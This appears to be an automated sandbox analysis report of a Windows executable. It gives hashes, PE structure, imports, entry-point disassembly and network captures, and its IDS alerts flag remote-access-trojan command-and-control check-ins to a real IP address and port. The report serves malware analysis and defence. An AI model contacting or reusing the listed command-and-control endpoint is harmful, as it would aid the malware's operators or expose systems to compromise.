                                                              Preview:..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10.. 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.999987563129512
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:Fqae7BLq4m.exe
                                                              File size:70'322'189 bytes
                                                              MD5:a994f2b3b899758bddf5f35e407a694d
                                                              SHA1:a13dedaceed797a4ee8b399c7db20e88535ab6cc
                                                              SHA256:6c547f7a7e7964a03945cef9bd53e792256e2beb24e15be780714ae349c8a81b
                                                              SHA512:3eb57e03e42b3a0ad54b885f042d70dc2ccd490d493faa0c5f36b5628751d3092ebd986a9ab38e46dd0854257672dddc3bb37a8df4e152776a6306caeabc8d00
                                                              SSDEEP:1572864:T6GU+TLvNqXhlk5jR/7ouTb4CYw1UnxcpMP0s/gH6iERvUUzVwDVuPOtW:Tauehlk/k8ww1UnqpMPHKAUU+gOY
                                                              TLSH:C8F73310E3A057B8F873007D5426CF9BE205ABA757D261637608073B31ADEEFFA065A5
                                                              File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................N...............0....@..........................................................................P.............................
                                                              Icon Hash:878fd7f3b9353593
                                                              Entrypoint:0x411def
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:
                                                              Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:b5a014d7eeb4c2042897567e1288a095
                                                              Instruction
                                                              push ebp
                                                              mov ebp, esp
                                                              push FFFFFFFFh
                                                              push 00414C50h
                                                              push 00411F80h
                                                              mov eax, dword ptr fs:[00000000h]
                                                              push eax
                                                              mov dword ptr fs:[00000000h], esp
                                                              sub esp, 68h
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              mov dword ptr [ebp-18h], esp
                                                              xor ebx, ebx
                                                              mov dword ptr [ebp-04h], ebx
                                                              push 00000002h
                                                              call dword ptr [00413184h]
                                                              pop ecx
                                                              or dword ptr [00419924h], FFFFFFFFh
                                                              or dword ptr [00419928h], FFFFFFFFh
                                                              call dword ptr [00413188h]
                                                              mov ecx, dword ptr [0041791Ch]
                                                              mov dword ptr [eax], ecx
                                                              call dword ptr [0041318Ch]
                                                              mov ecx, dword ptr [00417918h]
                                                              mov dword ptr [eax], ecx
                                                              mov eax, dword ptr [00413190h]
                                                              mov eax, dword ptr [eax]
                                                              mov dword ptr [00419920h], eax
                                                              call 00007FFA1C99C7C2h
                                                              cmp dword ptr [00417710h], ebx
                                                              jne 00007FFA1C99C6AEh
                                                              push 00411F78h
                                                              call dword ptr [00413194h]
                                                              pop ecx
                                                              call 00007FFA1C99C794h
                                                              push 00417048h
                                                              push 00417044h
                                                              call 00007FFA1C99C77Fh
                                                              mov eax, dword ptr [00417914h]
                                                              mov dword ptr [ebp-6Ch], eax
                                                              lea eax, dword ptr [ebp-6Ch]
                                                              push eax
                                                              push dword ptr [00417910h]
                                                              lea eax, dword ptr [ebp-64h]
                                                              push eax
                                                              lea eax, dword ptr [ebp-70h]
                                                              push eax
                                                              lea eax, dword ptr [ebp-60h]
                                                              push eax
                                                              call dword ptr [0041319Ch]
                                                              push 00417040h
                                                              push 00417000h
                                                              call 00007FFA1C99C74Ch
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x150dc0xb4.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x13c0.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x130000x310.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x113170x11400797279c5ab1a163aed1f2a528f9fe3ceFalse0.6174988677536232data6.576987441854239IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x130000x30ea0x32001359639b02bcb8f0a8743e6ead1c0030False0.43828125data5.549434098115495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x170000x292c0x8009415c9c8dea3245d6d73c23393e27d8eFalse0.431640625data3.6583182363171756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x1a0000x13c00x14005293a0fb2c46166ce21247d17e837639False0.3568359375data4.96958597460067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0x1a2500x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.3709677419354839
                                                              RT_ICON0x1a5380x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.6081081081081081
                                                              RT_MENU0x1a6600x4adataEnglishUnited States0.8648648648648649
                                                              RT_DIALOG0x1a6ac0xf2dataEnglishUnited States0.7148760330578512
                                                              RT_STRING0x1a7a00x40dataEnglishUnited States0.59375
                                                              RT_GROUP_ICON0x1a7e00x22dataEnglishUnited States1.0
                                                              RT_VERSION0x1a8040x314dataEnglishUnited States0.44416243654822335
                                                              RT_MANIFEST0x1ab180x60fXML 1.0 document, ASCII text, with CRLF line terminators0.4229529335912315
                                                              RT_MANIFEST0x1b1280x298XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4894578313253012
                                                              DLLImport
                                                              COMCTL32.dll
                                                              KERNEL32.dllGetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
                                                              USER32.dllCharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
                                                              GDI32.dllGetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
                                                              SHELL32.dllSHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
                                                              ole32.dllCoInitialize, CreateStreamOnHGlobal, CoCreateInstance
                                                              OLEAUT32.dllVariantClear, OleLoadPicture, SysAllocString
                                                              MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp
                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-12-22T09:45:56.226506+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.11.204976743.250.172.4217091TCP
                                                              2024-12-22T09:49:10.745908+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.11.204977443.250.172.4217091TCP
                                                              2024-12-22T09:50:22.475076+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.11.204977843.250.172.4217091TCP
                                                              2024-12-22T09:51:31.826363+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.11.204978143.250.172.4217092TCP
                                                              2024-12-22T09:52:33.964927+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.11.204978343.250.172.4217092TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 22, 2024 09:45:51.721719027 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:52.075526953 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.075792074 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:52.430036068 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.430062056 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.430078983 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.430093050 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.430207014 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:52.430368900 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:52.784007072 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.784028053 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.784260988 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:52.784286022 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.784303904 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.784318924 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.784332991 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.784346104 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.784459114 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:52.784558058 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:52.784616947 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:52.784718037 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.137936115 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.137952089 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.137968063 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.137979984 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138000011 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138109922 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.138159990 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.138171911 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138183117 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138194084 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138215065 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138226032 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138406038 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.138420105 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138433933 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138444901 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138454914 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138468981 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138482094 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.138577938 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.138751984 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.492130995 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.492145061 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.492158890 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.492171049 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.492352962 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.492363930 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.492373943 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.492383957 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.492393970 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.492403984 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.492424011 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.492685080 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.493578911 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.493593931 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.493773937 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.493788958 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.493848085 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.494009018 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.494023085 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.494033098 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.494067907 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.494146109 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.494911909 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495115995 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495121956 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.495203018 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495359898 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495371103 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495381117 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495424986 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495440960 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.495511055 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.495585918 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.495623112 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495632887 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495834112 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.495862007 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495918036 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495928049 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495938063 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.495948076 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.496112108 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.496159077 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.845896959 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.845911026 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.845927000 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846142054 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.846168041 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846215963 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846226931 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846236944 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846247911 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846261024 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846271038 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846281052 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846291065 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846498966 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846508980 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846518993 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846529007 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846581936 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846591949 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.846592903 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.846931934 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.847259998 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.847507954 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.847544909 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.847556114 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.847564936 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.847574949 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.847584009 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.847594023 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.847716093 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.847801924 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.847815037 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.847826958 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.848535061 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.848550081 CET188524976643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:53.848695040 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.848695040 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.848871946 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.848990917 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:53.849595070 CET4976618852192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:55.870605946 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:56.226063967 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:56.226314068 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:56.226505995 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:56.582258940 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:56.582715034 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:56.938393116 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:56.942007065 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:56.942090988 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:56.942169905 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:56.942243099 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:56.942349911 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:56.942502975 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:57.297962904 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.298038960 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.298049927 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.298219919 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.298228979 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.298237085 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.298250914 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:57.298295975 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.298384905 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:57.298463106 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:57.349483013 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:57.653934956 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.653949022 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654203892 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:57.654207945 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654227018 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654237032 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654441118 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:57.654495001 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654509068 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654519081 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654530048 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654670954 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654684067 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654759884 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654764891 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:57.654772043 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.654851913 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:57.654954910 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:57.705049038 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.705137968 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:57.705405951 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.009975910 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010055065 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010102987 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010251045 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.010339022 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010404110 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010449886 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010493040 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010548115 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010588884 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.010595083 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010588884 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.010638952 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010683060 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010735989 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010766983 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.010780096 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010823011 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010847092 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.010874033 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010899067 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.010925055 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010967970 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.010978937 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.011010885 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011066914 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011071920 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.011111975 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011153936 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011173964 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.011198997 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011253119 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011296034 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.011331081 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.011497974 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.061125994 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.061203003 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.061252117 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.061295986 CET170914976743.250.172.42192.168.11.20
